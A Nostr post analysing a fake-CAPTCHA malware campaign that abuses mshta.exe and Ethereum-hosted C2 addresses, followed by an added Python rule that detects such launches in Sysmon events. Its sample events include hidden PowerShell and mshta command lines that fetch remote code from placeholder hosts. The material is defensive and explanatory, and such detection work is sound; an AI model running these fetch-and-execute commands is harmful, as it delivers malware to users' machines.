2025-03-30 01:31:55
Ava ॐ on Nostr (in reply to an earlier note):

Unfortunately, I don’t have much time to dive deeply into this right now, but off the top of my head, this looks like a sophisticated attack leveraging mshta(.)exe to execute malicious code outside the browser sandbox.

The fake CAPTCHA trick is clever, as it uses social engineering to get users to run a command that fetches a second-stage payload.

The obfuscated JavaScript on the site is constructing and executing the payload dynamically using eval(). The use of Ethereum smart contracts for storing or distributing C2 server addresses is particularly notable—there is a growing trend in malware campaigns to leverage blockchain technology for resilience, as blockchain-based infrastructure is much harder to disrupt.

To figure out what the stage 2 payload does, you’d need to:

1. Capture the payload: Use a network proxy or sandbox to intercept the HTTP request made by mshta(.)exe and retrieve the payload.

2. Deobfuscate the JavaScript: Tools like jsbeautifier can help reveal how the payload is constructed.

3. Analyze the payload: Static and dynamic analysis in a controlled environment should provide insight into its behavior.

Blocking mshta(.)exe via group policies is a good mitigation step if it’s not required in your environment. Again, I’m swamped at the moment, but I hope this helps as a starting point. Let me know what you find out.
Author Public Key
npub1f6ugxyxkknket3kkdgu4k0fu74vmshawermkj8d06sz6jts9t4kslazcka
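Added example, not code from Ava's post: a small process-creation triage rule in Python for the mshta(.)exe launch pattern the post describes (a command pasted by the user that makes mshta fetch a second stage from a URL, outside the browser sandbox). The field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage); the sample events and the example.invalid hosts are constructed for illustration and are not indicators from the campaign.

```python
"""Flag mshta.exe launches matching the fake-CAPTCHA / pasted-command pattern.

Added example (not from the original post). Field names follow Sysmon
Event ID 1; the events below are constructed samples, not real telemetry.
"""
import re

# Constructed sample events. example.invalid is a placeholder host, not an IOC.
SAMPLE_EVENTS = [
    {   # the pattern from the post: user pastes a command, explorer spawns mshta with a URL
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/verify.hta',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # legitimate-looking local HTA started by an installer: no URL, non-interactive parent
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe C:\Program Files\Vendor\wizard.hta",
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
    },
    {   # same second-stage fetch wrapped in powershell, so Image is not mshta.exe
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -c "mshta http://example.invalid/x"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # unrelated process, should produce no finding
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
# "mshta" or "mshta.exe" at the start of the line or after a separator/quote
MSHTA_IN_CMD = re.compile(r"(?:^|[\\\s\"'])mshta(?:\.exe)?\b", re.IGNORECASE)
# parents that indicate a human typed or pasted the command (Run dialog, shell)
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles / and \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the reasons an event is suspicious; empty list means no finding."""
    reasons: list[str] = []
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))

    mentions_mshta = image == "mshta.exe" or MSHTA_IN_CMD.search(cmd) is not None
    if not mentions_mshta:
        return reasons
    if REMOTE_URL.search(cmd):
        reasons.append("mshta given a remote URL (second-stage fetch outside the browser)")
    if INLINE_SCRIPT.search(cmd):
        reasons.append("mshta given inline javascript:/vbscript: code")
    if image == "mshta.exe" and parent in INTERACTIVE_PARENTS:
        reasons.append(f"mshta started interactively from {parent} (pasted-command pattern)")
    if image != "mshta.exe":
        reasons.append(f"{image} spawning mshta via its command line")
    return reasons


def triage(events) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that produced at least one finding."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"])
        for reason in reasons:
            print("   -", reason)
```

The explorer.exe-parent rule matches the fake-CAPTCHA flow, where the victim pastes the command into the Run dialog; the URL and inline-script rules catch the second-stage fetch itself, whether mshta is the process or is launched through a wrapper such as PowerShell. A local .hta started by an installer produces no finding, which keeps the rule quiet where HTA is still used legitimately; if mshta.exe is not needed at all, the group-policy block mentioned in the post is the simpler control.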